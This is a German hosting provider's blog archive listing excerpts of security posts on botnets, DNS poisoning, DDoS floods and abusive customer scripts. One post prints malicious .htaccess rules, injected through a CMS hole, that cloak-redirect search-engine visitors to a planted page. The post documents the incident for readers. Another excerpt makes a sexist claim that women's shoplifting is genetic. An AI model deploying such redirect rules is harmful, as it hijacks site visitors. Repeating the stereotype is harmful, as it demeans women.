Archiv für die Kategorie 'Security'

Grütze zippen

Freitag, 23. Juli 2010

Ein Kollege hat das hier umgesetzt, wir haben jetzt ein viel, viel genaueres Accounting auf dem Cluster. Die Intervalle zur Auswertung sind frei wählbar.
Und einige Kunden kriegen jetzt Anrufe.
Man kann sich gar nicht vorstellen, was der ambitionierte Webmaster so alles bastelt. Zum Beispiel “Grütze zippen”: Eine Wordpress-Installation, die bei jedem Seitenaufruf ein 250MB-Backup erstellt. Was [...]

Security, Support | Keine Kommentare

Nach ein paar Bier am Lagerfeuer

Montag, 16. Juni 2008

Frauen klauen Klamotten. Der Gerechtigkeit halber fügen wir mal ein “Natürlich nicht Alle.” hinten an, aber inzwischen habe ich den Eindruck gewonnen, daß das irgendwie im zweiten X-Chromosom codiert sein muß. Abends, am Lagerfeuer, bekam ich einige Ihrer Tricks zu hören:
Die maximale Anzahl von Kleidungsstücken, die mit in die Kabine genommen werden darf, wird [...]

Allgemein, Security | Kommentare deaktiviert

Und was passiert nun mit dem Botnetz?

Samstag, 1. Dezember 2007

Daß ein Botnetz-Betreiber aufgeflogen ist, ist ja an sich erstmal eine gute Nachricht. Akill wird wohl verurteilt, aber niemand verliert ein Wort darüber, was nun mit dem Botnetz passiert. Irgendwie kann ich nicht glauben, daß es da auf Seiten einer gewissen Regierung keine Begehrlichkeiten gibt, zumal 1,3 Mio infizierte Rechner eine gewaltige Streitmacht sind, mit [...]

Security | Kommentare deaktiviert

Cracker haben neue Masche

Donnerstag, 16. August 2007

Ein Kunde bekam durch ein Leck in seinem CMS unwissentlich neue Regeln in seine .htaccess hinzugefügt:
RewriteEngine On
RewriteCond %{HTTP_REFERER} ^http://([a-z]+\.)?(google|msn|yahoo)\. [NC]
RewriteCond %{HTTP_REFERER} [?&](q|query|searchfor|w|p)\=
RewriteCond %{HTTP_REFERER} ![?&](q|query|searchfor|w|p)\=[^&]+(%3A|%22)
RewriteCond %{TIME_SEC} <57
RewriteRule ^.*$ /extern/jit/oruz/t.htm [L]

Ruft der Kunde seine Seite ganz normal auf, merkt er nichts von seinem neuen Untermieter. Nur wenn er auf einen Link in einer der Suchmaschinen klickt, [...]

Security | Kommentare deaktiviert

Bind DNS Cache Poisioning

Freitag, 27. Juli 2007

Das war abzusehen. Bei unseren Nameservern stieg die CPU-Last heute ganz erheblich an. Und diese Peaks lassen auch nichts Gutes erahnen…

Security | Kommentare deaktiviert

DDOS oder Kiddies?

Dienstag, 10. Juli 2007

Nachdem wir heute wieder mal von einer IP aus China mit 25MBit gefakten HTTP-Requests zugeballert wurden (pf sei Dank kommt sowas nie bis zu den Webservern durch), hier eine kurze Anekdote über eine vermeintliche kleine DDOS-Attacke.
Tausende verschiedene Rechner, vornehmlich aus dem Netz der TurkTelekom machten massenhaft Anfragen auf eine Web-Präsenz eines unserer Kunden.
Technisch haben wir [...]

Security | Kommentare deaktiviert

Du durchsuchst gerade das Archiv von datenklause.de nach Beiträgen, die der Kategorie 'Security' angehören.

Meta